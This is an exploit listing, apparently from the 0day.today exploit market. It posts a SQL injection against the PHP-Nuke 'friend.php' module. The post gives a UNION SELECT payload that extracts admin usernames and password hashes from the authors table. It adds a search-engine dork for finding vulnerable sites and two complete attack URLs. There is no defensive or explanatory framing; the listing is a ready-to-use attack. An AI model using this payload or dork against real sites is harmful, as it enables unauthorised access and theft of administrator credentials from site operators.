[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

PHP-Nuke (friend.php) Module Remote SQL Injection Vulnerability

Author
CMD
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-12154
Category
web applications
Date add
07-05-2010
Platform
php
===============================================================
PHP-Nuke (friend.php) Module Remote SQL Injection Vulnerability
===============================================================

# Exploit Title: [PHP-Nuke 'friend.php' Module Remote SQL Injection]
# Author: [CMD]
# Contact : cemede@ilkposta.com
# Version: [all version]
 
=-==-==-==-==-==-==-==C==M==D==-==-==-==-==-==-==-==-==-==-==-=
# Code : [/**/and/**/1=0/**/union/**/select/**/group_concat(aid,0x3a,pwd)/**/from/**/authors/*]
 
=-==-==-==-==-==-==-==C==M==D==-==-==-==-==-==-==-==-==-==-==-=
# Dork : inurl:friend.php?op=FriendSend
 
=-==-==-==-==-==-==-==C==M==D==-==-==-==-==-==-==-==-==-==-==-=
Example1: www.target.com/friend.php?op=FriendSend&sid=392/**/and/**/1=0/**/union/**/select/**/group_concat(aid,0x3a,pwd)/**/from/**/authors/**/where/**/radminsuper=1/*
Example1: www.target.com/friend.php?op=FriendSend&sid=392/**/and/**/1=0/**/union/**/select/**/group_concat(aid,0x3a,pwd)/**/from/**/nuke_authors/**/where/**/radminsuper=1/*
=-==-==-==-==-==-==-==C==M==D==-==-==-==-==-==-==-==-==-==-==-=
 
# Th@nks : AmeN, MUS4LLAT, Kayahan, Sinaritx, JacKaL, Qasım, Metrp0l, Despot...
 
# Says : Hemso bak bi dene bug daha xD ... 



#  0day.today [2024-12-24]  #